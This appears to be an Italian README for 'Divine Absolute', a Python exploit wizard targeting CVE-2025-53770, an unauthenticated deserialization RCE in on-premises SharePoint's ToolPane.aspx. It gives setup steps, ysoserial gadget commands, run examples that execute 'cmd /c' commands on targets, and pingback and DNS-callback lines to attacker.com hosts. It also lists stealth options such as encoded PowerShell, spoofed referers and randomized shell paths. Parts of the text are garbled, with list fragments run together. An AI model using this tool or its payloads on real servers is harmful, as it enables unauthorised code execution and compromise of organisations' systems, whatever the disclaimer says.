
Uno strumento di exploit Python sofisticato e guidato da procedura guidata che sfrutta CVE-2025-53770, una vulnerabilità critica (CVSS 9.8) di esecuzione remota di codice non autenticata in Microsoft SharePoint Server on-premise (2016, 2019, Subscription Edition)
Divine Absolute è un sofisticato strumento di exploit Python guidato da wizard che mira a CVE-2025-53770, una vulnerabilità critica (CVSS 9.8) di esecuzione di codice in remoto (RCE) non autenticata in Microsoft SharePoint Server on-premises (2016, 2019, Subscription Edition). Questa vulnerabilità, divulgata come zero-day il 19 luglio 2025, deriva dalla deserializzazione di dati non attendibili in /_layouts/15/ToolPane.aspx. Lo strumento è progettato esclusivamente per test di penetrazione etici e ricerche di sicurezza autorizzate, offrendo una precisione, furtività e adattabilità senza pari per ricognizione, sfruttamento e verifica.
Repository: https://github.com/exfil0/CVE-2025-53770
⚠️ Avviso Legale: Questo strumento è destinato solo a uso lecito e autorizzato in ambienti controllati con esplicito permesso. L'uso non autorizzato contro sistemi di cui non si possiede o non si ha il permesso di testare è illegale e può comportare gravi conseguenze legali. L'autore non si assume alcuna responsabilità per usi impropri.
ToolPane.aspx con punteggio avanzato e regex (es. 16.0.0.\d+-\w+?).ToolPane.aspx con robusti bypass.WebRequest.Create, Dns.GetHostEntry).-enc)./xp.aspx, basati su UUID).www.google.com), URL personalizzati o percorsi interni di SharePoint (es. /_layouts/15/sharepoint.aspx)./_layouts/15/ToolPane.aspx./ToolPane.aspx, usare regole WAF (es. Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe in un percorso noto (es. ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (tramite Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe sia accessibile o fornire il suo percorso durante l'esecuzione.Eseguire il wizard interattivo:
python divine_absolute.py
Recon: Scansiona per presenza e versione di SharePoint.Exploit: Invia payload a ToolPane.aspx.Full: Ricognizione + exploit (modalità aggressiva opzionale).https://sharepoint.example.com).ObjectDataProvider) e comando (es. cmd /c whoami).http://attacker.com/callback o sub.attacker.com).NONE, BASIC_REFLECTION, o snippet personalizzato.python divine_absolute.py
# Selezionare: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# Selezionare: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Selezionare: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Selezionare: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
I risultati vengono salvati in xanthorox_results.json con i campi:
target: URL testato.sharepoint_detected: Booleano.toolpane_accessible: Booleano.exploited: Booleano (payload inviato).verified_rce: Booleano/None (RCE confermata).error: Eventuali errori incontrati.Esempio:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
Questa versione corregge:
-enc); supporta comandi non PowerShell (es. cmd.exe) con avvisi.pythonnet per pingback DNS affidabile con Dns.GetHostEntry (sperimentale, richiede gadget per effetto completo).ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 e verificare i log DNS.Dns.GetHostEntry in pythonnet potrebbe non attivarsi senza una specifica catena di gadget.I contributi sono benvenuti! Si prega di:
git checkout -b feature/miglioramento-fantastico).git commit -m "Aggiunto miglioramento fantastico").git push origin feature/miglioramento-fantastico).Questo progetto è concesso in licenza secondo i termini della MIT License. Vedi LICENSE per i dettagli.
Nota: Verificare sempre i payload e le configurazioni in un laboratorio controllato prima dell'uso. Rimanete etici, rimanete legali.
RequestException e codici di stato/percorsi personalizzabili.MicrosoftSharePointTeamServices), percorsi (es. /versions.aspx) e regex.CONCAT_OBFUSCATEDNONE, FIXED (es. /xp.aspx), RANDOM (basato su UUID).DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), regex (es. Xanthorox.*), codici di stato (es. 200,403), tentativi, ritardo e timeout.